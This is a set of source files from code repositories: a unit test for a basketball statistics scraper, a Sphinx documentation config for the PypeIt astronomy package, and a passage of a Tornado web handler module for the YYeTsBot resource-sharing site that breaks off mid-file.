192df4ac7d4b320dbd5a89a50bbadbd326738208 | 1,227 | py | Python | tests/unit/html/test_regular_season_player_box_scores_table.py | tttgm/basketball_reference_web_scraper | 2dbd9d7bacbcfee17f08bcf8629bd7d50893761d | [
"MIT"
] | 325 | 2015-10-27T03:15:49.000Z | 2022-03-16T06:49:12.000Z | tests/unit/html/test_regular_season_player_box_scores_table.py | tttgm/basketball_reference_web_scraper | 2dbd9d7bacbcfee17f08bcf8629bd7d50893761d | [
"MIT"
] | 173 | 2018-10-16T04:11:05.000Z | 2022-03-29T17:52:08.000Z | tests/unit/html/test_regular_season_player_box_scores_table.py | tttgm/basketball_reference_web_scraper | 2dbd9d7bacbcfee17f08bcf8629bd7d50893761d | [
"MIT"
] | 97 | 2016-04-09T19:11:28.000Z | 2022-03-21T09:57:50.000Z | from unittest import TestCase
from unittest.mock import MagicMock
from basketball_reference_web_scraper.html import PlayerSeasonBoxScoresTable, PlayerSeasonBoxScoresRow
class TestPlayerSeasonBoxScoresTable(TestCase):
    """Unit tests for PlayerSeasonBoxScoresTable row extraction and XPath query."""

    def setUp(self):
        # Stand-in for the parsed HTML document the table wraps.
        self.html = MagicMock()

    def _make_table(self):
        # Every test exercises a table built around the mocked document.
        return PlayerSeasonBoxScoresTable(html=self.html)

    def test_rows_query(self):
        expected_query = '//tbody/tr[not(contains(@class, "thead"))]'
        self.assertEqual(expected_query, self._make_table().rows_query)

    def test_rows_returns_empty_array_when_there_are_not_any_matching_rows(self):
        self.html.xpath = MagicMock(return_value=[])
        self.assertListEqual([], self._make_table().rows)

    def test_rows_returns_populated_array_when_there_are_matching_rows(self):
        first_row_html = MagicMock(name="first matching row html")
        second_row_html = MagicMock(name="second matching row html")
        self.html.xpath = MagicMock(return_value=[first_row_html, second_row_html])
        expected_rows = [
            PlayerSeasonBoxScoresRow(html=first_row_html),
            PlayerSeasonBoxScoresRow(html=second_row_html),
        ]
        self.assertListEqual(expected_rows, self._make_table().rows)
| 39.580645 | 102 | 0.717196 |
4ceb9cfdb1f68aaf5d3b8b8d51f43e192da3501e | 11,178 | py | Python | doc/conf.py | AnnIsaacs7/PypeIt | 07e84b1885bd136aa6e33916bb15d24d8e405c2c | [
"BSD-3-Clause"
] | null | null | null | doc/conf.py | AnnIsaacs7/PypeIt | 07e84b1885bd136aa6e33916bb15d24d8e405c2c | [
"BSD-3-Clause"
] | null | null | null | doc/conf.py | AnnIsaacs7/PypeIt | 07e84b1885bd136aa6e33916bb15d24d8e405c2c | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#
# PypeIt documentation build configuration file, created by
# sphinx-quickstart on Fri Nov 13 13:39:35 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
from pkg_resources import get_distribution
# Get configuration information from setup.cfg
from configparser import ConfigParser
conf = ConfigParser()
conf.read([os.path.join(os.path.dirname(__file__), '..', 'setup.cfg')])
setup_cfg = dict(conf.items('metadata'))
#
## If extensions (or modules to document with autodoc) are in another directory,
## add these directories to sys.path here. If the directory is relative to the
## documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('../pypeit'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx_automodapi.automodapi',
'sphinx.ext.napoleon',
'sphinx.ext.doctest',
'sphinx.ext.graphviz',
'sphinx.ext.inheritance_diagram',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
'sphinx.ext.autosectionlabel',
]
# Nicer math rendering than sphinx default?
# mathjax_path='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML'
#automodapi
numpydoc_show_class_members = False
# Napoleon settings
napoleon_numpy_docstring = True
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
# Autosection
autosectionlabel_prefix_document = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'PypeIt'
copyright = u'2020, Prochaska, Hennawi, Cooke, and Associates'
author = u'Prochaska, Hennawi, Cooke, and Associates'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
# The full version, including alpha/beta/rc tags.
release = get_distribution(setup_cfg['name']).version
# The short X.Y.Z version.
version = '.'.join(release.split('.')[:3])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build', 'include/*.rst', 'help/*.rst']
# When nit-picking, ignore these warnings:
nitpick_ignore = [ ('py:class', 'optional'),
('py:class', 'array-like'),
('py:class', 'scalar-like'),
('py:class', 'default') ]
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'lovelace'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# TODO: I think I prefer this theme; bizstyle would be my second choice
html_theme = 'sphinx_rtd_theme'
#html_theme = 'sphinxdoc'
#html_theme = 'bizstyle'
#html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%m %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
html_sidebars = {
'**': ['localtoc.html', 'globaltoc.html', 'relations.html', 'sourcelink.html']
}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'PypeItdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'PypeIt.tex', u'PypeIt Documentation',
u'Cooke, Prochaska, and Associates', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'pypeit', u'PypeIt Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'PypeIt', u'PypeIt Documentation',
author, 'PypeIt', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
# NOTE: the old "plain URL key" form ({'https://...': None}) is deprecated and
# rejected by modern Sphinx; each entry must be a named tuple of
# (target URL, inventory or None).
intersphinx_mapping = {'python': ('https://docs.python.org/', None)}
| 32.213256 | 104 | 0.71927 |
ef958845d70e683f6818234a3c71540e85e9aa81 | 26,858 | py | Python | yyetsweb/handler.py | kuyacai/YYeTsBot | 9d73aecce87dc3a0f0ebc6da230d548555d00a59 | [
"MIT"
] | 1 | 2021-09-14T19:45:53.000Z | 2021-09-14T19:45:53.000Z | yyetsweb/handler.py | kuyacai/YYeTsBot | 9d73aecce87dc3a0f0ebc6da230d548555d00a59 | [
"MIT"
] | 3 | 2022-02-28T14:37:36.000Z | 2022-03-31T14:31:05.000Z | yyetsweb/handler.py | kuyacai/YYeTsBot | 9d73aecce87dc3a0f0ebc6da230d548555d00a59 | [
"MIT"
] | 1 | 2021-09-16T14:30:34.000Z | 2021-09-16T14:30:34.000Z | #!/usr/local/bin/python3
# coding: utf-8
# YYeTsBot - handler.py
# 6/16/21 20:30
#
__author__ = "Benny <benny.think@gmail.com>"
import contextlib
import importlib
import json
import logging
import os
import re
import sys
import time
import uuid
from concurrent.futures import ThreadPoolExecutor
from datetime import date, timedelta
from hashlib import sha1
from http import HTTPStatus
import filetype
from tornado import escape, gen, web
from tornado.concurrent import run_on_executor
from database import AntiCrawler, CaptchaResource, Redis
escape.json_encode = lambda value: json.dumps(value, ensure_ascii=False)
logging.basicConfig(level=logging.INFO)
if getattr(sys, '_MEIPASS', None):
adapter = "SQLite"
else:
adapter = "Mongo"
logging.info("%s Running with %s. %s", "#" * 10, adapter, "#" * 10)
static_path = os.path.join(os.path.dirname(__file__), 'templates')
index = os.path.join(static_path, "index.html")
class BaseHandler(web.RequestHandler):
    """Common base for all API handlers: JSON body parsing, DB adapter wiring,
    cookie-based authentication and compact error bodies."""

    # Shared thread pool; methods decorated with @run_on_executor run here.
    executor = ThreadPoolExecutor(200)
    # Resolved against the adapter module at class-definition time, e.g.
    # "FakeMongoResource" or "FakeSQLiteResource"; subclasses override it.
    class_name = f"Fake{adapter}Resource"
    adapter_module = importlib.import_module(f"{adapter}")

    def __init__(self, application, request, **kwargs):
        """Best-effort parse the request body as JSON and build the resource
        object (the storage-layer class named by ``class_name``)."""
        super().__init__(application, request, **kwargs)
        self.json = {}
        with contextlib.suppress(ValueError):
            self.json: dict = json.loads(self.request.body)
        self.instance = getattr(self.adapter_module, self.class_name)()

    def write_error(self, status_code, **kwargs):
        # For these statuses, return the exception info as the body instead of
        # tornado's default HTML error page.
        if status_code in [HTTPStatus.FORBIDDEN,
                           HTTPStatus.INTERNAL_SERVER_ERROR,
                           HTTPStatus.UNAUTHORIZED,
                           HTTPStatus.NOT_FOUND]:
            self.write(str(kwargs.get('exc_info')))

    def data_received(self, chunk):
        # Streaming request bodies are not used by this application.
        pass

    def get_current_user(self) -> str:
        """Return the username from the signed cookie, or "" when anonymous."""
        username = self.get_secure_cookie("username") or b""
        return username.decode("u8")
class TopHandler(BaseHandler):
    """Serve the most-viewed resource rankings."""

    class_name = f"Top{adapter}Resource"

    # from Mongo import TopMongoResource
    # instance = TopMongoResource()

    def get_user_like(self) -> list:
        # Resources the current (cookie) user has marked as favourite.
        username = self.get_current_user()
        return self.instance.get_user_like(username)

    def get_most(self) -> list:
        return self.instance.get_most()

    @run_on_executor()
    def get_top_resource(self):
        return self.instance.get_top_resource()

    @gen.coroutine
    def get(self):
        resp = yield self.get_top_resource()
        self.write(resp)
class IndexHandler(BaseHandler):
    """Serve the single-page-app entry point (templates/index.html)."""

    @run_on_executor()
    def send_index(self):
        # Read the SPA shell from disk on every request; no in-process cache.
        with open(index, encoding="u8") as fp:
            return fp.read()

    @gen.coroutine
    def get(self):
        page = yield self.send_index()
        self.write(page)
class UserHandler(BaseHandler):
    """Login/registration, profile query and profile update endpoints."""

    class_name = f"User{adapter}Resource"

    # from Mongo import UserMongoResource
    # instance = UserMongoResource()

    def set_login(self, username):
        # Signed login cookie, valid for 365 days.
        self.set_secure_cookie("username", username, 365)

    @run_on_executor()
    def login_user(self):
        """Handle both registration and login.

        The resource layer decides which one happened and reports it through
        ``status_code``: CREATED means a new account, OK an existing one; on
        either success the login cookie is set, otherwise the error status is
        propagated to the response.
        """
        data = self.json
        username = data["username"]
        password = data["password"]
        captcha = data.get("captcha")
        captcha_id = data.get("captcha_id", "")
        ip = AntiCrawler(self).get_real_ip()
        browser = self.request.headers['user-agent']
        response = self.instance.login_user(username, password, captcha, captcha_id, ip, browser)
        if response["status_code"] in (HTTPStatus.CREATED, HTTPStatus.OK):
            self.set_login(username)
        else:
            self.set_status(response["status_code"])
        return response

    @run_on_executor()
    def update_info(self):
        result = self.instance.update_user_info(self.current_user, self.json)
        self.set_status(result.get("status_code", HTTPStatus.IM_A_TEAPOT))
        return result

    @run_on_executor()
    def get_user_info(self) -> dict:
        username = self.get_current_user()
        if username:
            data = self.instance.get_user_info(username)
        else:
            self.set_status(HTTPStatus.UNAUTHORIZED)
            data = {"message": "Please try to login"}
        return data

    @gen.coroutine
    def post(self):
        resp = yield self.login_user()
        self.write(resp)

    @gen.coroutine
    def get(self):
        resp = yield self.get_user_info()
        self.write(resp)
        # everytime we receive a GET request to this api, we'll update last_date and last_ip
        username = self.get_current_user()
        if username:
            now_ip = AntiCrawler(self).get_real_ip()
            self.instance.update_user_last(username, now_ip)

    @gen.coroutine
    @web.authenticated
    def patch(self):
        resp = yield self.update_info()
        self.write(resp)
class ResourceHandler(BaseHandler):
    """CRUD endpoints for a single resource, plus keyword search."""

    class_name = f"Resource{adapter}Resource"

    # from Mongo import ResourceMongoResource
    # instance = ResourceMongoResource()

    @run_on_executor()
    def get_resource_data(self):
        ban = AntiCrawler(self)
        if ban.execute():
            # Request looks like a crawler: refuse and log the offender.
            logging.warning("%s@%s make you happy:-(", self.request.headers.get("user-agent"), ban.get_real_ip())
            self.set_status(HTTPStatus.FORBIDDEN)
            return {}
        else:
            resource_id = int(self.get_query_argument("id"))
            username = self.get_current_user()
            data = self.instance.get_resource_data(resource_id, username)
            if not data:
                # not found, dangerous
                # Probing for non-existent ids is treated as scraping: ban the IP.
                ip = ban.get_real_ip()
                ban.imprisonment(ip)
                self.set_status(HTTPStatus.NOT_FOUND)
                data = {}
            return data

    @run_on_executor()
    def search_resource(self):
        kw = self.get_query_argument("keyword").lower()
        return self.instance.search_resource(kw)

    @gen.coroutine
    def get(self):
        # ?id=... returns one resource; ?keyword=... searches; otherwise "error".
        if self.get_query_argument("id", None):
            resp = yield self.get_resource_data()
        elif self.get_query_argument("keyword", None):
            resp = yield self.search_resource()
        else:
            resp = "error"
        self.write(resp)

    # patch and post are available to every login user
    # these are rare operations, so no gen.coroutine and run_on_executor
    @web.authenticated
    def patch(self):
        if self.instance.is_admin(self.get_current_user()):
            # may consider add admin restrictions
            # NOTE(review): this branch is currently a no-op — the admin check
            # result is ignored and every logged-in user may patch.
            pass
        # Stamp every submitted item with its creator and a fresh item id.
        for item in self.json["items"].values():
            for i in item:
                i["creator"] = self.get_current_user()
                i["itemid"] = uuid.uuid4().hex
        self.instance.patch_resource(self.json)
        self.set_status(HTTPStatus.CREATED)
        self.write({})

    @web.authenticated
    def post(self):
        # New resources start with an empty episode list and record the creator.
        self.json["data"]["list"] = []
        self.json["data"]["info"]["creator"] = self.get_current_user()
        self.set_status(HTTPStatus.CREATED)
        resp = self.instance.add_resource(self.json)
        self.write(resp)

    @web.authenticated
    def delete(self):
        # Deletion is admin-only.
        if not self.instance.is_admin(self.get_current_user()):
            self.set_status(HTTPStatus.FORBIDDEN)
            self.write({"status": False, "message": "admin only"})
            return
        self.instance.delete_resource(self.json)
        self.set_status(HTTPStatus.ACCEPTED)
        self.write({})
class ResourceLatestHandler(BaseHandler):
    """Return the most recently updated resources, truncated to ?size=N."""

    class_name = f"ResourceLatest{adapter}Resource"

    @run_on_executor()
    def get_latest(self):
        limit = int(self.get_query_argument("size", "100"))
        payload = self.instance.get_latest_resource()
        payload["data"] = payload["data"][:limit]
        return payload

    @gen.coroutine
    def get(self):
        latest = yield self.get_latest()
        self.write(latest)
#
# class ResourceLatestHandler(BaseHandler):
# from concurrent.futures import ProcessPoolExecutor
#
# class_name = f"ResourceLatest{adapter}Resource"
# executor = ProcessPoolExecutor(200)
#
# # from Mongo import ResourceLatestMongoResource
# # instance = ResourceLatestMongoResource()
#
# @gen.coroutine
# def get(self):
# # This returns a concurrent.futures.Future
# fut = self.executor.submit(self.instance.get_latest_resource)
# ret = yield fut
# self.write(ret)
class LikeHandler(BaseHandler):
    """Query and toggle the current user's favourite resources."""

    class_name = f"Like{adapter}Resource"

    # from Mongo import LikeMongoResource
    # instance = UserLikeMongoResource()

    @run_on_executor()
    def like_data(self):
        username = self.get_current_user()
        return {"LIKE": self.instance.get_user_like(username)}

    @gen.coroutine
    @web.authenticated
    def get(self):
        resp = yield self.like_data()
        self.write(resp)

    @run_on_executor()
    def add_remove_fav(self):
        # Toggle favourite status; the resource layer reports add/remove via
        # status_code, which is forwarded to the HTTP response.
        data = self.json
        resource_id = int(data["resource_id"])
        username = self.get_current_user()
        if username:
            response = self.instance.add_remove_fav(resource_id, username)
            self.set_status(response["status_code"])
        else:
            response = {"message": "请先登录"}
            self.set_status(HTTPStatus.UNAUTHORIZED)
        return response["message"]

    @gen.coroutine
    @web.authenticated
    def patch(self):
        resp = yield self.add_remove_fav()
        self.write(resp)
class NameHandler(BaseHandler):
    """Expose the resource-name list; ?human=1 selects the readable form."""

    class_name = f"Name{adapter}Resource"

    @run_on_executor()
    def get_names(self):
        readable_flag = self.get_query_argument("human", None)
        return self.instance.get_names(readable_flag)

    @gen.coroutine
    def get(self):
        names = yield self.get_names()
        self.write(names)
class CommentHandler(BaseHandler):
    """List, add and delete comments on a resource."""

    class_name = f"Comment{adapter}Resource"

    # from Mongo import CommentMongoResource
    # instance = CommentMongoResource()

    @staticmethod
    def hide_phone(data: list):
        """Mask the middle four digits of usernames that look like 11-digit
        phone numbers, in place; returns the same list."""
        for item in data:
            if item["username"].isdigit() and len(item["username"]) == 11:
                item["username"] = re.sub(r"(\d{3})\d{4}(\d{4})", r"\g<1>****\g<2>", item["username"])
        return data

    @run_on_executor()
    def get_comment(self):
        # Outer pagination (page/size) is for top-level comments; inner_* pages
        # through the replies nested under each comment.
        resource_id = int(self.get_argument("resource_id", "0"))
        size = int(self.get_argument("size", "5"))
        page = int(self.get_argument("page", "1"))
        inner_size = int(self.get_argument("inner_size", "5"))
        inner_page = int(self.get_argument("inner_page", "1"))
        if not resource_id:
            self.set_status(HTTPStatus.BAD_REQUEST)
            return {"status": False, "message": "请提供resource id"}
        comment_data = self.instance.get_comment(resource_id, page, size, inner_size=inner_size, inner_page=inner_page)
        self.hide_phone((comment_data["data"]))
        return comment_data

    @run_on_executor()
    def add_comment(self):
        # comment_id is present only when replying to an existing comment.
        payload = self.json
        captcha = payload["captcha"]
        captcha_id = payload["id"]
        content = payload["content"]
        resource_id = payload["resource_id"]
        comment_id = payload.get("comment_id")
        real_ip = AntiCrawler(self).get_real_ip()
        username = self.get_current_user()
        browser = self.request.headers['user-agent']
        result = self.instance.add_comment(captcha, captcha_id, content, resource_id, real_ip,
                                           username, browser, comment_id)
        self.set_status(result["status_code"])
        return result

    @run_on_executor()
    def delete_comment(self):
        # need resource_id & id
        # payload = {"id": "obj_id"}
        # Admin-only operation.
        payload = self.json
        username = self.get_current_user()
        comment_id = payload["comment_id"]
        if self.instance.is_admin(username):
            result = self.instance.delete_comment(comment_id)
            self.set_status(result["status_code"])
            return result
        else:
            self.set_status(HTTPStatus.UNAUTHORIZED)
            return {"count": 0, "message": "You're unauthorized to delete comment."}

    @gen.coroutine
    def get(self):
        resp = yield self.get_comment()
        self.write(resp)

    @gen.coroutine
    @web.authenticated
    def post(self):
        resp = yield self.add_comment()
        self.write(resp)

    @gen.coroutine
    @web.authenticated
    def delete(self):
        resp = yield self.delete_comment()
        self.write(resp)
class CommentReactionHandler(BaseHandler):
    """Add (POST) or remove (DELETE) an emoji reaction on a comment."""

    class_name = f"CommentReaction{adapter}Resource"

    # from Mongo import CommentReactionMongoResource
    # instance = CommentReactionMongoResource()

    @run_on_executor()
    def comment_reaction(self):
        # The HTTP method is passed along so one resource call can serve both
        # add (POST) and remove (DELETE).
        self.json.update(method=self.request.method)
        username = self.get_current_user()
        result = self.instance.react_comment(username, self.json)
        self.set_status(result.get("status_code"))
        return result

    @gen.coroutine
    @web.authenticated
    def post(self):
        resp = yield self.comment_reaction()
        self.write(resp)

    @gen.coroutine
    @web.authenticated
    def delete(self):
        resp = yield self.comment_reaction()
        self.write(resp)
class CommentChildHandler(CommentHandler):
    """Paginate the replies nested under one parent comment."""

    class_name = f"CommentChild{adapter}Resource"

    # from Mongo import CommentChildResource
    # instance = CommentChildResource()

    @run_on_executor()
    def get_comment(self):
        # Same shape as CommentHandler.get_comment, but keyed by parent_id
        # instead of resource_id.
        parent_id = self.get_argument("parent_id", "0")
        size = int(self.get_argument("size", "5"))
        page = int(self.get_argument("page", "1"))
        if not parent_id:
            self.set_status(HTTPStatus.BAD_REQUEST)
            return {"status": False, "message": "请提供 parent_id"}
        comment_data = self.instance.get_comment(parent_id, page, size)
        self.hide_phone((comment_data["data"]))
        return comment_data

    @gen.coroutine
    def get(self):
        resp = yield self.get_comment()
        self.write(resp)
class CommentNewestHandler(CommentHandler):
    """Paginate the newest comments across all resources."""

    class_name = f"CommentNewest{adapter}Resource"

    # from Mongo import CommentNewestResource
    # instance = CommentNewestResource()

    @run_on_executor()
    def get_comment(self):
        size = int(self.get_argument("size", "5"))
        page = int(self.get_argument("page", "1"))
        comment_data = self.instance.get_comment(page, size)
        self.hide_phone((comment_data["data"]))
        return comment_data

    @gen.coroutine
    def get(self):
        resp = yield self.get_comment()
        self.write(resp)
class AnnouncementHandler(BaseHandler):
    """List site announcements; admins may post new ones."""

    class_name = f"Announcement{adapter}Resource"

    # from Mongo import AnnouncementMongoResource
    # instance = AnnouncementMongoResource()

    @run_on_executor()
    def get_announcement(self):
        size = int(self.get_argument("size", "5"))
        page = int(self.get_argument("page", "1"))
        return self.instance.get_announcement(page, size)

    @run_on_executor()
    def add_announcement(self):
        # Only admins may post announcements.
        username = self.get_current_user()
        if not self.instance.is_admin(username):
            self.set_status(HTTPStatus.FORBIDDEN)
            return {"message": "只有管理员可以设置公告"}

        payload = self.json
        content = payload["content"]
        real_ip = AntiCrawler(self).get_real_ip()
        browser = self.request.headers['user-agent']
        self.instance.add_announcement(username, content, real_ip, browser)
        self.set_status(HTTPStatus.CREATED)
        return {"message": "添加成功"}

    @gen.coroutine
    def get(self):
        resp = yield self.get_announcement()
        self.write(resp)

    @gen.coroutine
    @web.authenticated
    def post(self):
        resp = yield self.add_announcement()
        self.write(resp)
class CaptchaHandler(BaseHandler, CaptchaResource):
    """Issue (GET) and verify (POST) captcha challenges, keyed by client id."""

    @run_on_executor()
    def verify_captcha(self):
        data = self.json
        captcha_id = data.get("id", None)
        userinput = data.get("captcha", None)
        if captcha_id is None or userinput is None:
            self.set_status(HTTPStatus.BAD_REQUEST)
            return "Please supply id or captcha parameter."
        returned = self.verify_code(userinput, captcha_id)
        status_code = returned.get("status")
        if not status_code:
            self.set_status(HTTPStatus.FORBIDDEN)
        return returned

    @run_on_executor()
    def captcha(self):
        # The client supplies its own request id; the captcha is stored under it.
        request_id = self.get_argument("id", None)
        if request_id is None:
            self.set_status(HTTPStatus.BAD_REQUEST)
            return "Please supply id parameter."

        return self.get_captcha(request_id)

    @gen.coroutine
    def get(self):
        resp = yield self.captcha()
        self.write(resp)

    @gen.coroutine
    def post(self):
        resp = yield self.verify_captcha()
        self.write(resp)
class MetricsHandler(BaseHandler):
    """Record page-view metrics (POST) and report them to admins (GET)."""

    class_name = f"Metrics{adapter}Resource"

    # from Mongo import MetricsMongoResource
    # instance = MetricsMongoResource()

    @run_on_executor()
    def set_metrics(self):
        payload = self.json
        metrics_type = payload["type"]
        self.instance.set_metrics(metrics_type)
        self.set_status(HTTPStatus.CREATED)
        return {}

    @run_on_executor()
    def get_metrics(self):
        # Non-admins get 404 rather than 403 so the endpoint is not discoverable.
        if not self.instance.is_admin(self.get_current_user()):
            self.set_status(HTTPStatus.NOT_FOUND)
            return ""
        # only return latest 7 days. with days parameter to generate different range
        from_date = self.get_query_argument("from", None)
        to_date = self.get_query_argument("to", None)
        if to_date is None:
            to_date = time.strftime("%Y-%m-%d", time.localtime())
        if from_date is None:
            from_date = time.strftime("%Y-%m-%d", time.localtime(time.time() - 3600 * 24 * 7))

        return self.instance.get_metrics(from_date, to_date)

    @gen.coroutine
    def get(self):
        resp = yield self.get_metrics()
        self.write(resp)

    @gen.coroutine
    def post(self):
        resp = yield self.set_metrics()
        self.write(resp)
class GrafanaIndexHandler(BaseHandler):
    """Grafana datasource health check: reply with an empty JSON object."""

    def get(self):
        self.write({})
class GrafanaSearchHandler(BaseHandler):
    """Grafana /search endpoint: the fixed list of queryable metric names."""

    def post(self):
        data = ["resource", "top", "home", "search", "extra", "discuss", "multiDownload", "download", "user", "share",
                "me", "database", "help", "backOld", "favorite", "unFavorite", "comment"]
        self.write(json.dumps(data))
class GrafanaQueryHandler(BaseHandler):
    """Grafana /query endpoint: return one time series per requested target."""

    class_name = f"GrafanaQuery{adapter}Resource"

    # from Mongo import GrafanaQueryMongoResource
    # instance = GrafanaQueryMongoResource()

    @staticmethod
    def generate_date_series(start: str, end: str) -> list:
        """Return every date from *start* to *end* inclusive as 'YYYY-MM-DD'."""
        start_int = [int(i) for i in start.split("-")]
        end_int = [int(i) for i in end.split("-")]
        sdate = date(*start_int)  # start date
        edate = date(*end_int)  # end date
        delta = edate - sdate  # as timedelta
        days = []
        for i in range(delta.days + 1):
            day = sdate + timedelta(days=i)
            days.append(day.strftime("%Y-%m-%d"))
        return days

    @staticmethod
    def time_str_int(text):
        # 'YYYY-MM-DD' -> POSIX timestamp in seconds (local time).
        return time.mktime(time.strptime(text, "%Y-%m-%d"))

    def post(self):
        """Build Grafana's datapoints payload: [[value, epoch_ms], ...] per target."""
        payload = self.json
        start = payload["range"]["from"].split("T")[0]
        end = payload["range"]["to"].split("T")[0]
        date_series = self.generate_date_series(start, end)
        targets = [i["target"] for i in payload["targets"] if i["target"]]
        # The metric query does not depend on the target, so run it once and
        # materialize it, instead of re-querying the database once per target
        # as the original did (which also breaks if the result is a one-shot
        # cursor/generator).
        result = list(self.instance.get_grafana_data(date_series))
        grafana_data = []
        for target in targets:
            data_points = []
            i: dict
            for i in result:
                # Grafana expects timestamps in milliseconds.
                datum = [i[target], self.time_str_int(i["date"]) * 1000] if i.get(target) else []
                data_points.append(datum)
            temp = {
                "target": target,
                "datapoints": data_points
            }
            grafana_data.append(temp)
        self.write(json.dumps(grafana_data))
class BlacklistHandler(BaseHandler):
